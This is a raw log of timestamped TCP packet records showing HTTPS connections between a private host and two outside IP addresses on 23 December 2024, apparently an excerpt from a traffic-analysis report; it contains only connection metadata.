                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.327862024 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.327908993 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.328020096 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.328056097 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.328382015 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.375341892 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.382831097 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.383003950 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.383078098 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.383099079 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.383251905 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.383296013 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385175943 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385351896 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385507107 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385543108 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385562897 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385751963 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385799885 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.385799885 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.405853987 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.405987978 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.406097889 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.406152964 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.407871008 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.408858061 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.408875942 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.408921003 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409142017 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409179926 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409271002 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409275055 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409298897 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409310102 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409343958 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409431934 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409470081 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409543037 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409567118 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409584999 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409596920 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409614086 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409632921 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409727097 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409737110 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409753084 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409770012 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409801006 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409810066 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409826994 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409871101 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409890890 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409910917 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409946918 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.409992933 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.410034895 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.410073996 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.410103083 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411022902 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411042929 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411129951 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411155939 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411215067 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411232948 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411246061 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411259890 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411295891 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411319971 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411331892 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411366940 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411381006 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411397934 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411402941 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411425114 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411591053 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.411624908 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.413028002 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.413052082 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.413249016 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.413347006 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.413393021 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.413397074 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.413422108 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.413469076 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.413567066 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.415071011 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.415096998 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.415199995 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.415225983 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.415256023 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.415333986 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.415440083 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.415471077 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.415472984 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.415482044 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.419002056 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.419025898 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.419209957 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.419246912 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.419274092 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.419523954 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.419564009 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.419694901 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.425296068 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.425424099 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.425590038 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.425622940 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.425679922 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.425801992 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.425837994 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.468766928 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.468905926 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.469223976 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.469263077 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.469280958 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.469388008 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.469417095 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.469695091 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.511332035 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.524530888 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.524660110 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.524713039 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.524823904 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.537436008 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.537544012 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.537619114 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.537635088 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.537745953 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.537785053 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.537837982 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.537864923 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.537976027 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.538023949 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.538115025 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.538223028 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.538263083 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.538280010 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.538402081 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.538467884 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.538568974 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.538697958 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.538729906 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.538742065 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.538892984 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.539025068 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.539061069 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.539062977 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.539120913 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.539171934 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.539205074 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.539222956 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.569716930 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.569819927 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.569948912 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.569983959 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.569984913 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.569984913 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570005894 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570070028 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570183992 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570221901 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570252895 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570373058 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570861101 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570888042 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.570902109 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.571028948 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.571046114 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611291885 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611382008 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611510038 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611552954 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611562967 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611625910 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611670971 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.611700058 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641613007 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641676903 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641803026 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641844034 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641844988 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641868114 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.641920090 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.642044067 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.642115116 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.642136097 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.642262936 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.642306089 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.642306089 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.665692091 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.665894032 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666047096 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666119099 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666119099 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666145086 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666282892 CET50015443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666316986 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.666336060 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.667012930 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:40.677165031 CET4435001594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.603009939 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.603049040 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.603558064 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.603822947 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.603828907 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.606065035 CET50034443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.606091976 CET4435003420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.606214046 CET50034443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.606682062 CET50034443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.606694937 CET4435003420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.783158064 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.783221006 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.783996105 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.784004927 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.785799026 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:41.785804033 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.455612898 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.455652952 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.456244946 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.456485033 CET50035443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.456502914 CET4435003520.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.600533962 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.600645065 CET4435003620.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.600795984 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.600974083 CET50036443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.601011038 CET4435003620.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.662347078 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.662384033 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.662455082 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.662506104 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.662529945 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.662535906 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.662575960 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.662602901 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.662734032 CET50027443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.662758112 CET4435002794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.669157028 CET50037443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.669190884 CET4435003794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.669356108 CET50037443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.671622038 CET50037443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:42.671637058 CET4435003794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.146025896 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.146338940 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.146349907 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.146858931 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.147202015 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.147275925 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.147283077 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.147294998 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.147325993 CET50033443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.147367001 CET4435003320.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.147732973 CET4435003420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.147947073 CET50034443192.168.2.520.42.73.24
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.147968054 CET4435003420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.148447037 CET4435003420.42.73.24192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:43.148710966 CET50034443192.168.2.520.42.73.24
